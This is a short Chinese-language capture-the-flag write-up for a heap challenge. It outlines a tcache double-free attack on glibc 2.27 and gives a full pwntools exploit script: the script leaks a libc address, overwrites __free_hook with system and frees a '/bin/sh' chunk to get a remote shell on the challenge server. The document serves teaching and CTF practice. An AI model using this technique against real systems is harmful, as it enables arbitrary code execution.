[tcache double free]
1. ida分析
2.思路
- 先填满tcache,使用unstored bin泄漏libc的地址(这里只能申请9个chunk,可以将chunk 0 释放7次,填满tcache)
- 利用double free修改free_hook为system
- 释放chunk中内容是
/bin/sh\x00
的chunk,free_hook
将chunk中的内容作为参数传入
3. exp
from pwn import *
from LibcSearcher import *
elf = ELF('./Mynote_Max')
p = remote('47.99.38.177', 10001)
local_libc_64 = ELF('./libc-2.27.so')
s=lambda data :p.send(data)
sa=lambda delim,data :p.sendafter(delim, data)
sl=lambda data :p.sendline(data)
sla=lambda delim,data :p.sendlineafter(delim, data)
r=lambda numb=4096 :p.recv(numb)
ru=lambda delims :p.recvuntil(delims)
uu64=lambda data :u64(data.ljust(8,'\x00'))
leak=lambda name,addr :log.success('{} ===> {:#x}'.format(name, addr))
def debug():
gdb.attach(p)
pause()
def add(size,cont):
sla(':','1')
sla(':',str(size))
sla(':',cont)
def show(index):
sla(':','2')
sla(':',str(index))
def free(index):
sla(':','3')
sla(':',str(index))
def remove_tcache(numb):
for i in range(numb):
free(i)
free(i)
def fill_tcache(numb):
for i in range(numb):
add(0x100,'/bin/sh\x00')
add(0x90,'0')
add(0x90,'1')
add(0x90,'/bin/sh\x00')
for i in range(7):
free(0)
free(1)
show(1)
ru('Content: ')
libc_base =uu64(r(6)) - 96 -local_libc_64.sym['__malloc_hook'] -0x10
print("offset-------"+hex(96+local_libc_64.sym['__malloc_hook']+0x10))
leak("libc_base",libc_base)
system = libc_base+local_libc_64.sym['system']
free_hook = libc_base+local_libc_64.sym['__free_hook']
leak("free_hook",free_hook)
leak("system",system)
add(0x90,p64(free_hook))
add(0x90,p64(free_hook))
add(0x90,p64(system))
free(2)
p.interactive()